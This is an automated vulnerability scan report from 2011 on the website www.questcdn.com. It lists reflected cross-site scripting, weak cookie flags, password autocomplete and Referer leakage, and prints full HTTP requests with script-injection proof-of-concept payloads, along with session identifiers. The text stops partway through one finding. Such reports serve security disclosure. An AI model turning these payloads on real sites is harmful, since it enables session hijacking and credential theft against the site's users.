XSS, SQL Injection, CWE-89, CWE-79, CAPEC-86, CAPEC-66, Cross Site Scripting, www.questcdn.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Mar 06 10:21:32 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html [current_tab parameter]

1.2. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html [current_tab parameter]

1.3. https://www.questcdn.com/questcdn/subscribe/sub_form.html [REST URL parameter 2]

1.4. https://www.questcdn.com/questcdn/subscribe/sub_form.html [REST URL parameter 2]

2. SSL cookie without secure flag set

2.1. https://www.questcdn.com/questcdn/

2.2. https://www.questcdn.com/questcdn/subscribe/sub_form.html

3. Cookie without HttpOnly flag set

3.1. http://www.questcdn.com/questcdn/

3.2. http://www.questcdn.com/questcdn/action/myProjectConnector

3.3. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html

3.4. https://www.questcdn.com/questcdn/

3.5. https://www.questcdn.com/questcdn/subscribe/sub_form.html

4. Password field with autocomplete enabled

5. Cross-domain Referer leakage

5.1. http://www.questcdn.com/questcdn/action/myProjectConnector

5.2. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html

5.3. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html

6. Email addresses disclosed

7. Content type incorrectly stated

7.1. http://www.questcdn.com/questcdn/

7.2. http://www.questcdn.com/questcdn/action/myProjectConnector

7.3. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html

7.4. https://www.questcdn.com/questcdn/

8. SSL certificate



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html [current_tab parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.questcdn.com
Path:   /questcdn/setTab/projects/MyProjects/my_projects.html

Issue detail

The value of the current_tab request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26826'%3balert(1)//4b0506bb7ad was submitted in the current_tab parameter. This input was echoed as 26826';alert(1)//4b0506bb7ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects26826'%3balert(1)//4b0506bb7ad&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:38:56 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:38:56 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 29023
Content-Type: text/html;charset=utf-8

<!--$Header: planholder_list.html, 11/24/2009, Eric Nelsen$-->
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"/>

       <title>
...[SNIP]...
ClassName = 'current';
var disabledClassName = 'disabled';
var currentTabName = 'current_tab';
var currentSubTabName = 'current_sub_tab';
var sCurrentTab = 'projects26826';alert(1)//4b0506bb7ad';
var sCurrentSubTab = ''"-->
...[SNIP]...

1.2. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html [current_tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.questcdn.com
Path:   /questcdn/setTab/projects/MyProjects/my_projects.html

Issue detail

The value of the current_tab request parameter is copied into the HTML document as plain text between tags. The payload 34d27<script>alert(1)</script>d6f5183293b was submitted in the current_tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects34d27<script>alert(1)</script>d6f5183293b&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:38:57 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:38:57 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 29062
Content-Type: text/html;charset=utf-8

<!--$Header: planholder_list.html, 11/24/2009, Eric Nelsen$-->
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"/>

       <title>
...[SNIP]...
teSubMenu';
var pageMenuClassName = 'pageMenu';

function initTab()
{
//alert('initTab');
getPageUrl();
//alert('sCurrentTab:[projects34d27<script>alert(1)</script>d6f5183293b] sCurrentSubTab:['"-->
...[SNIP]...

1.3. https://www.questcdn.com/questcdn/subscribe/sub_form.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.questcdn.com
Path:   /questcdn/subscribe/sub_form.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5199f"><script>alert(1)</script>f28e47964b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /questcdn/subscribe5199f"><script>alert(1)</script>f28e47964b0/sub_form.html?root_page=true HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Referer: http://questcdn.com/questcdn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:35:55 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/302372953122911545; Expires=Thu, 03-Mar-2011 23:35:55 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 340
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<html>
<body onload="location.replace('/questcdn/subscribe5199f"><script>alert(1)</script>f28e47964b0/sub_form.html?root_page=true&xreferrer='+escape(document.referrer))">
<h1>Not Found</h1><br>
The r
...[SNIP]...

1.4. https://www.questcdn.com/questcdn/subscribe/sub_form.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.questcdn.com
Path:   /questcdn/subscribe/sub_form.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8f87<script>alert(1)</script>9f270dece1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /questcdn/subscribed8f87<script>alert(1)</script>9f270dece1e/sub_form.html?root_page=true HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Referer: http://questcdn.com/questcdn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:35:55 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/4815737455179659300; Expires=Thu, 03-Mar-2011 23:35:55 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 336
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<html>
<body onload="location.replace('/questcdn/subscribed8f87<script>alert(1)</script>9f270dece1e/sub_form.html?root_page=true&xreferrer='+escape(document.referrer))">
<h1>Not Found</h1><br>
The requested URL /questcdn/subscribed8f87<script>alert(1)</script>9f270dece1e/sub_form.html was not found on this server.<br>
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 2 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.questcdn.com/questcdn/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.questcdn.com
Path:   /questcdn/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /questcdn/ HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 01:04:15 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Fri, 04-Mar-2011 01:04:15 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2295
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 19:04:15.549 [ 1] (TP-Processor1667) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

2.2. https://www.questcdn.com/questcdn/subscribe/sub_form.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.questcdn.com
Path:   /questcdn/subscribe/sub_form.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /questcdn/subscribe/sub_form.html?root_page=true HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Referer: http://questcdn.com/questcdn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:35:12 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/8756590032920786406; Expires=Thu, 03-Mar-2011 23:35:12 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 66153
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!--$Header: c:/questcdn/cvs/quest-src/www/subscribe/sub_form.html,v 1.1.1.1 2005/01/28 18:06:37 rstruthers Exp $-->
<html>

   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-88
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.questcdn.com/questcdn/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.questcdn.com
Path:   /questcdn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /questcdn/ HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:45:15 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:45:15 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2295
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 17:45:15.296 [ 1] (TP-Processor2021) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

3.2. http://www.questcdn.com/questcdn/action/myProjectConnector  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.questcdn.com
Path:   /questcdn/action/myProjectConnector

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /questcdn/action/myProjectConnector?user_no=&member_no=&allMember=&category=1 HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Referer: http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:39:01 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:39:01 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2166
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 17:39:01.536 [ 1] (TP-Processor2006) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

3.3. http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.questcdn.com
Path:   /questcdn/setTab/projects/MyProjects/my_projects.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:38:50 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Thu, 03-Mar-2011 23:38:50 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 29451
Content-Type: text/html;charset=utf-8

<!--$Header: planholder_list.html, 11/24/2009, Eric Nelsen$-->
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"/>

       <title>
...[SNIP]...

3.4. https://www.questcdn.com/questcdn/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.questcdn.com
Path:   /questcdn/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /questcdn/ HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 01:04:15 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/699697036116497425; Expires=Fri, 04-Mar-2011 01:04:15 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2295
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<font color="#FF0000">2011/03/01 19:04:15.549 [ 1] (TP-Processor1667) Problem with service<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/lang/NullPointerException.html" target="new">
...[SNIP]...

3.5. https://www.questcdn.com/questcdn/subscribe/sub_form.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.questcdn.com
Path:   /questcdn/subscribe/sub_form.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /questcdn/subscribe/sub_form.html?root_page=true HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Referer: http://questcdn.com/questcdn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:35:12 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/8756590032920786406; Expires=Thu, 03-Mar-2011 23:35:12 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 66153
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!--$Header: c:/questcdn/cvs/quest-src/www/subscribe/sub_form.html,v 1.1.1.1 2005/01/28 18:06:37 rstruthers Exp $-->
<html>

   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-88
...[SNIP]...

4. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.questcdn.com
Path:   /questcdn/subscribe/sub_form.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /questcdn/subscribe/sub_form.html?root_page=true HTTP/1.1
Host: www.questcdn.com
Connection: keep-alive
Referer: http://questcdn.com/questcdn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 23:35:12 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/8756590032920786406; Expires=Thu, 03-Mar-2011 23:35:12 GMT; Path=/questcdn
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 66153
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8

<!--$Header: c:/questcdn/cvs/quest-src/www/subscribe/sub_form.html,v 1.1.1.1 2005/01/28 18:06:37 rstruthers Exp $-->
<html>

   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-88
...[SNIP]...
<body bgcolor="white">
       <form name="UserInfo" action="/questcdn/action/" method="post">
       <input type="hidden" name="UserType" value="0">
...[SNIP]...
<td width="290" height="10"><input type="password" name="password" size="37" maxlength="50" value="" ></td>
...[SNIP]...
<td width="290" height="10"><input type="password" name="pasword_con" size="37" maxlength="50" value="" ></td>
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.questcdn.com/questcdn/action/myProjectConnector  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questcdn.com
Path:   /questcdn/action/myProjectConnector

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /questcdn/action/myProjectConnector?user_no=&member_no=&allMember=&category=1 HTTP/1.1
Host: www.questcdn.com
Proxy-Connection: keep-alive
Referer: http://www.questcdn.com/questcdn/setTab/projects/MyProjects/my_projects.html?current_tab=projects&current_sub_tab=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000201)%3C/script%3E
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionIdentifier=/699697036116497425

Response

HTTP/1.1 200 OK
